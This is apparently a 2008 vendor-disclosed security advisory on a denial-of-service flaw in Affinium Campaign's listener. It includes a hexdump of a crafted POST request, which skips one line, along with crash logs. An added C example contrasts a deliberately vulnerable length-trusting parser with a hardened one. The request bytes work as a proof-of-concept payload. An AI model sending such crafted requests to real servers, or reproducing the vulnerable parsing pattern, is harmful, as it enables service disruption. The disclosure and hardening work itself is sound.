Security Advisory 08-007 – Affinium Campaign’s Listener is Vulnerable to Denial of Service

Vulnerability Title:

The listener is vulnerable to Denial of Service.

Vulnerable System:

Affinium Campaign

Vulnerability discovery and development:

Portcullis Security Testing Services

Credit for Discovery:

Tim Brown and Neil Kettle – Portcullis Computer Security Ltd.

Affected Systems:

All known versions of Affinium Campaign are believed to be affected; the vulnerability was discovered on version 7.2.1.0.55.

Details:

Whilst it was not possible to confirm the exact nature of the vulnerability, it is believed that, on connecting to the listener server, a four byte length value is accepted and used in calculations relating to memory allocation. By supplying an invalid value for this length, the server can be made to fail when allocating or accessing memory. Note: in reproducing this, repeated connections were spawned, each sending a four byte value that was incremented on every connection until the server crashed.

Similar issues can also be triggered from the web application which is typically deployed in front of the listener server. In this case the application makes use of an ActiveX control which encapsulates binary data within an HTTP POST request to http://webserver/Campaign/CampaignListener. Since the CampaignListener web page expects binary data, no attempt is made to validate the input before it is passed to the listener server. It was identified that length encoding is again used and, as with the direct connection, manipulation of these length fields affects memory allocation: by specifying invalid two byte length values, the server can be made to fail when allocating memory. The following request demonstrates this (the manipulated length bytes, d3 4d, are at offset 0x200):

00000000 50 4f 53 54 20 2f 43 61 6d 70 61 69 67 6e 2f 43 |POST /Campaign/C|
00000010 61 6d 70 61 69 67 6e 4c 69 73 74 65 6e 65 72 3f |ampaignListener?|
00000020 43 6c 69 65 6e 74 49 44 3d 35 20 48 54 54 50 2f |ClientID=5 HTTP/|
00000030 31 2e 31 0d 0a 48 6f 73 74 3a 20 77 65 62 73 65 |1.1..Host: webse|
00000040 72 76 65 72 0d 0a 43 6f 6f 6b 69 65 3a 20 43 41 |rver..Cookie: CA|
00000050 4d 50 41 49 47 4e 53 45 53 53 49 4f 4e 49 44 3d |MPAIGNSESSIONID=|
00000060 48 56 73 62 47 35 70 6e 44 37 52 6c 79 67 6e 43 |HVsbG5pnD7RlygnC|
00000070 38 64 74 4e 56 50 76 50 43 51 56 57 32 37 78 54 |8dtNVPvPCQVW27xT|
00000080 4c 63 76 79 36 51 57 63 51 51 4c 51 32 51 52 52 |Lcvy6QWcQQLQ2QRR|
00000090 46 56 57 76 21 31 33 36 34 35 35 34 39 33 34 0d |FVWv!1364554934.|
000000a0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a |.Content-Length:|
000000b0 20 32 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 | 296..Content-Ty|
000000c0 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f |pe: multipart/fo|
000000d0 72 6d 2d 64 61 74 61 0d 0a 0d 0a 1f 01 00 00 01 |rm-data.........|
000000e0 00 02 07 0c 00 00 00 01 01 00 00 00 03 00 00 00 |................|
000000f0 12 0c 00 00 00 75 6e 69 63 61 5f 61 63 73 76 72 |.....unica_acsvr|
00000100 00 12 73 00 00 00 2f 61 70 70 73 2f 75 6e 69 63 |..s.../apps/unic|
00000110 61 2f 61 66 66 69 6e 69 75 6d 2f 41 66 66 69 6e |a/affinium/Affin|
00000120 69 75 6d 2f 43 61 6d 70 61 69 67 6e 2f 70 61 72 |ium/Campaign/par|
00000130 74 69 74 69 6f 6e 73 2f 70 61 72 74 69 74 69 6f |titions/partitio|
00000140 6e 31 2f 63 61 6d 70 61 69 67 6e 73 2f 41 41 41 |n1/campaigns/AAA|
00000150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|

00000170 41 41 41 41 41 41 41 41 00 04 2a 00 00 00 0e f2 |AAAAAAAA..*....ò|
00000180 95 47 51 57 f2 00 00 00 00 00 14 00 00 00 01 29 |.GQWò..........)|
00000190 d5 1b 4f 5f 75 72 f9 00 66 3c 62 8a b8 d6 c3 a6 |Õ.O_urù.f<b.¸ÖÃ¦|
000001a0 4f 63 00 00 00 00 00 00 12 0b 00 00 00 70 61 72 |Oc...........par|
000001b0 74 69 74 69 6f 6e 31 00 12 00 00 00 00 12 0e 00 |tition1.........|
000001c0 00 00 31 32 30 31 30 30 37 38 37 31 32 39 38 00 |..1201007871298.|
000001d0 05 01 00 00 00 00 00 00 00 05 01 00 00 00 00 00 |................|
000001e0 00 00 05 01 00 00 00 02 00 00 00 12 03 00 00 00 |................|
000001f0 2d 6c 00 12 06 00 00 00 65 6e 5f 55 53 00 41 41 |-l......en_US.AA|
00000200 d3 4d 00 0d 0a |ÓM...|

The status log included the following lines detailing the Denial of Service:

01/22/2008 13:48:13.220 [E] [MEMORY] SBRK value: 20ab2d50; _end: 200a2974; difference: 10552284 [hmem:2101]

01/22/2008 13:48:13.220 [E] [MEMORY] OUT OF MEMORY: Unable to REALLOCATE 1305706496 bytes. [hmem:2404]

1305706496 is 0x4dd38000 in hexadecimal. Once byte order and encoding have been accounted for, the top two bytes correspond to our invalid two byte length value of 0xd34d: the bytes d3 4d at offset 0x200 of the request above, which read as a little-endian value give 0x4dd3.
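The root cause on both the direct listener path and the web path described above is the same: a length field supplied by the client is used to size an allocation (and the copy into it) before anyone checks that it is plausible. The C program below is an added example, not Portcullis's or the vendor's code. The record layout it parses (a 0x12 tag byte, a four byte little-endian length, then that many bytes including a terminating NUL) is our reading of the string records visible in the hexdump above, not a documented Affinium format; the well-formed sample bytes are re-typed from that dump, and the malformed record is constructed, borrowing the 0x4dd38000 figure from the log line as its declared length. The 4096 byte ceiling is an assumed policy limit, not a vendor value. The naive reader shows the vulnerable pattern; the hardened reader shows the checks that would have refused the request instead of passing it to realloc.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TAG_STRING     0x12
#define MAX_STRING_LEN 4096u  /* assumed policy ceiling, not a vendor value */

/* Constructed sample: the tag 0x12 string records re-typed from the
 * advisory's hexdump (offsets 0xeb, 0x1a8, 0x1b8, 0x1bd, 0x1f0, 0x1f7).
 * Layout assumed: tag, 4-byte LE length, then that many bytes incl. NUL. */
static const uint8_t SAMPLE_GOOD[] = {
    0x12, 0x0c,0x00,0x00,0x00, 'u','n','i','c','a','_','a','c','s','v','r',0,
    0x12, 0x0b,0x00,0x00,0x00, 'p','a','r','t','i','t','i','o','n','1',0,
    0x12, 0x00,0x00,0x00,0x00,
    0x12, 0x0e,0x00,0x00,0x00, '1','2','0','1','0','0','7','8','7','1','2','9','8',0,
    0x12, 0x03,0x00,0x00,0x00, '-','l',0,
    0x12, 0x06,0x00,0x00,0x00, 'e','n','_','U','S',0,
};

/* Constructed malformed record: declared length 0x4dd38000 (the OUT OF MEMORY figure), two payload bytes present. */
static const uint8_t SAMPLE_BAD[] = { 0x12, 0x00,0x80,0xd3,0x4d, 'A','A' };

static uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* VULNERABLE pattern: the client-supplied length sizes both the allocation and
 * the copy. On SAMPLE_BAD this asks malloc for ~1.3 GB and, if that succeeds,
 * memcpy reads far past the received bytes. Shown for contrast only. */
static char *naive_read_string(const uint8_t *buf, size_t *off)
{
    uint32_t len = read_le32(buf + *off + 1);
    char *s = malloc(len ? len : 1);
    if (s == NULL) return NULL;
    memcpy(s, buf + *off + 5, len);
    *off += 5 + (size_t)len;
    return s;
}

enum { PARSE_OK = 0, PARSE_TRUNCATED = -1, PARSE_BAD_TAG = -2, PARSE_LEN_EXCEEDS_INPUT = -3,
       PARSE_LEN_EXCEEDS_POLICY = -4, PARSE_NOT_TERMINATED = -5, PARSE_OOM = -6 };

/* HARDENED: the length is checked against the bytes actually received and against
 * a fixed ceiling before malloc is called, and the NUL terminator is verified. */
static int safe_read_string(const uint8_t *buf, size_t buflen, size_t *off, char **out)
{
    size_t pos = *off;
    *out = NULL;
    if (pos > buflen || buflen - pos < 5) return PARSE_TRUNCATED;
    if (buf[pos] != TAG_STRING) return PARSE_BAD_TAG;
    uint32_t len = read_le32(buf + pos + 1);
    if (len > buflen - pos - 5) return PARSE_LEN_EXCEEDS_INPUT;   /* the DoS check */
    if (len > MAX_STRING_LEN) return PARSE_LEN_EXCEEDS_POLICY;
    if (len > 0 && buf[pos + 5 + len - 1] != 0) return PARSE_NOT_TERMINATED;
    char *s = malloc((size_t)len + 1);
    if (s == NULL) return PARSE_OOM;
    memcpy(s, buf + pos + 5, len);
    s[len] = '\0';                     /* terminated even when len == 0 */
    *off = pos + 5 + len;
    *out = s;
    return PARSE_OK;
}

/* Walk every string record; returns the count or the first PARSE_* error. */
static int count_strings(const uint8_t *buf, size_t buflen)
{
    size_t off = 0;
    int n = 0;
    for (; off < buflen; n++) {
        char *s;
        int rc = safe_read_string(buf, buflen, &off, &s);
        if (rc != PARSE_OK) return rc;
        free(s);
    }
    return n;
}

/* Does the hardened reader yield `expect` as the first record? */
static int first_string_is(const uint8_t *buf, size_t buflen, const char *expect)
{
    size_t off = 0; char *s = NULL;
    if (safe_read_string(buf, buflen, &off, &s) != PARSE_OK) return 0;
    int ok = strcmp(s, expect) == 0;
    free(s);
    return ok;
}

int main(void)
{
    size_t off = 0;
    char *s = naive_read_string(SAMPLE_GOOD, &off);  /* well-formed input: fine */
    printf("naive reader, good input: \"%s\"\n", s ? s : "(alloc failed)");
    free(s);
    printf("hardened reader, good input: %d records\n", count_strings(SAMPLE_GOOD, sizeof SAMPLE_GOOD));
    printf("hardened reader, bad input: rc=%d (declared length 0x%08x)\n",
           count_strings(SAMPLE_BAD, sizeof SAMPLE_BAD), (unsigned)read_le32(SAMPLE_BAD + 1));
    return 0;
}
```

Compile with `cc -Wall -o tlv tlv.c && ./tlv`. The order of checks matters: comparing the declared length against the bytes actually received is the check that defeats the crash described in this advisory, since no honest client can declare more payload than it sent, and it costs nothing; the policy ceiling is a second line of defence against a client that pads a request to back up an absurd length. Note that the naive reader is only ever called on the well-formed sample here, because on the malformed record its behaviour is exactly the failure the status log records.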

Impact:

An attacker would be able to cause a Denial of Service.

Exploit:

Exploit code is not required.

Vendor Status:

05/06/2008 – vendor informed

10/06/2008 – Vendor updated

11/06/2008 – Vendor responded via email

16/07/2008 – Vendor confirmed patches

Copyright:

Copyright © Portcullis Computer Security Limited 2008, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.